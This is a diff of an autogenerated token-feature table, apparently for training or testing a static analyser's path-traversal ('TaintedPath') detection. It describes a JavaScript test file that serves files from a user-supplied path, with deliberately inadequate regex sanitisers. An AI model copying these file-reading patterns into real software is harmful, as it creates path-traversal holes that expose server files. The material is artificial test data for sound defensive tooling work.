pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:65 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:73 | pathMod ... replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:73 | pathMod ... replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:73 | pathMod ... replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:73 | pathMod ... replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:73 | pathMod ... replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | exceptional return of pathMod ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | exceptional return of pathMod ... +/, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | exceptional return of pathMod ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | exceptional return of pathMod ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | exceptional return of pathMod ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | pathMod ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | pathMod ... +/, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | pathMod ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | pathMod ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | pathMod ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:189:40:189:95 | pathMod ... +/, '') | stringConcatenatedWith | 'prefix' -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:189:51:189:59 | normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:51:189:59 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:51:189:59 | normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:51:189:59 | normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:51:189:59 | normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:189:61:189:64 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/TaintedPath.js:189:61:189:64 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:189:61:189:64 | path | calleeImports | path | @@ -6495,6 +65290,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:189:61:189:64 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:189:61:189:64 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:189:61:189:64 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:189:67:189:73 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:67:189:73 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:189:67:189:73 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:189:67:189:73 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:189:67:189:73 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:189:75:189:90 | /^(\\.\\.[\\/\\\\])+/ | CalleeFlexibleAccessPath | pathModule.normalize().replace | | autogenerated/TaintedPath/TaintedPath.js:189:75:189:90 | /^(\\.\\.[\\/\\\\])+/ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:189:75:189:90 | /^(\\.\\.[\\/\\\\])+/ | calleeImports | path | @@ -6511,6 +65311,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:189:93:189:94 | '' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | | autogenerated/TaintedPath/TaintedPath.js:189:93:189:94 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:189:93:189:94 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:3:190:96 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:7:190:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:7:190:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:7:190:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:7:190:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:7:190:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | exceptional return of fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | exceptional return of fs.read ... /, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | exceptional return of fs.read ... /, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | exceptional return of fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | exceptional return of fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | fs.read ... /, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | fs.read ... /, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6519,6 +65359,17 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:190:13:190:95 | fs.read ... /, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:190:16:190:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:16:190:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:16:190:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:16:190:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:16:190:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:29:190:36 | "prefix" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:29:190:36 | "prefix" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:29:190:36 | "prefix" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace 